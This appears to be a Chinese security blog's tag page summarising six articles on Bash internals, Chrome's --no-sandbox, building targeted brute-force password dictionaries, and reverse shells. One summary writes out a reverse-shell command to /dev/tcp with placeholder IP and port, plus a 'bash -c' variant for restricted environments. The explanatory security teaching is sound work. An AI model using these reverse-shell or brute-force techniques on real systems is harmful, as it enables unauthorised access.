// TAG
#chrome
6 篇
红队渗透深度字典攻击(实操笔记·红笔思考)
本文介绍了高效爆破字典的构建方法。建议从小规模爆破开始验证字典有效性,使用软链接复用工具文件。字典构造流程包括:使用cewl提取目标关键词生成种子字典,通过hashcat规则扩展变形,追加筛选后的通用字典,最后用awk去重保留原有顺序。强调针对性是深度字典攻击的核心,推荐软链接复用系统文件,并指出sort -u会破坏字典优先级排序。最终形成高命中率、低冗余的成品字典,提升爆破效率。
阅读 →
LinuxBash 替换机制(一):命令替换与进程替换
本文详细解析了Bash中命令替换和进程替换两种核心机制。命令替换通过$(command)语法将命令输出动态嵌入到命令行中,适用于变量赋值、参数传递等场景。进程替换则使用<(command)或>(command)语法将进程I/O流伪装为临时文件,解决需要文件参数的命令处理问题。文章从语法定义、工作原理到典型应用场景进行了系统阐述,并指出命令替换是"输出结果替换",而进程替换是"文件路径替换"的本质区别。这两种机制都能显著提升Bash脚本编程的灵活性和效率,但
阅读 →
Linux反弹Shell场景中bash -c与直接bash -i的适用差异解析
反弹Shell命令中直接使用bash -i >& /dev/tcp/IP/端口与嵌套bash -c "bash -i >& /dev/tcp/IP/端口"的区别源于执行环境的差异。前者要求当前环境为纯净的bash且无干扰,后者通过外层bash -c创建独立上下文,解决非bash环境或环境污染问题。由于两种方式分别针对"环境干净"和"环境受限"的互斥场景,故几乎不会同时适用,本质是bash进程上下文隔离特性的体现。
阅读 →
LinuxBash One-Liners 学习精要指南
本文系统介绍Bash单行命令的高效用法,涵盖文件操作、字符串处理等核心场景。通过重定向、参数扩展等内置特性实现简洁强大的功能: 文件操作:清空/追加文件、随机读取行、路径解析等 字符串处理:生成序列、拆分/连接字符串、模式替换等 采用Bash原生语法(如${var##*/}提取文件名),减少外部命令依赖 强调正确引用和IFS处理,避免常见陷阱
阅读 →
安全研究Linux 中 exec 等冷门命令的执行逻辑探究
本文深入解析Linux shell中的冷门命令exec及其相关工具的执行逻辑。exec通过execve()系统调用直接替换当前shell进程,命令结束后终端会退出,适用于脚本优化和进程管理。对比普通命令的fork-exec-wait模型,exec省去fork()步骤,提升效率但风险较高。文章还介绍了source(加载脚本到当前shell)、eval(动态执行字符串)、trap(信号处理)等冷门命令,揭示它们在进程控制、资源管理中的独特作用。通过剖析Linux进程模型,说明这些命令如何绕过fork()
阅读 →
安全研究为什么 root 用户运行某些应用必须加 --no-sandbox
在 Linux/Docker 场景里,以 root 身份启动 Chrome、Chromium、Electron 甚至 AppImage 时,经常会遇到于是大家被迫加上才能继续。这串神秘参数到底是什么意思?为什么 root 用户就不能乖乖用默认方式启动?禁用沙盒又会带来什么风险?本文用“原理 → 原因 → 风险 → 解决”四个层次,一次性把来龙去脉讲清楚。
阅读 →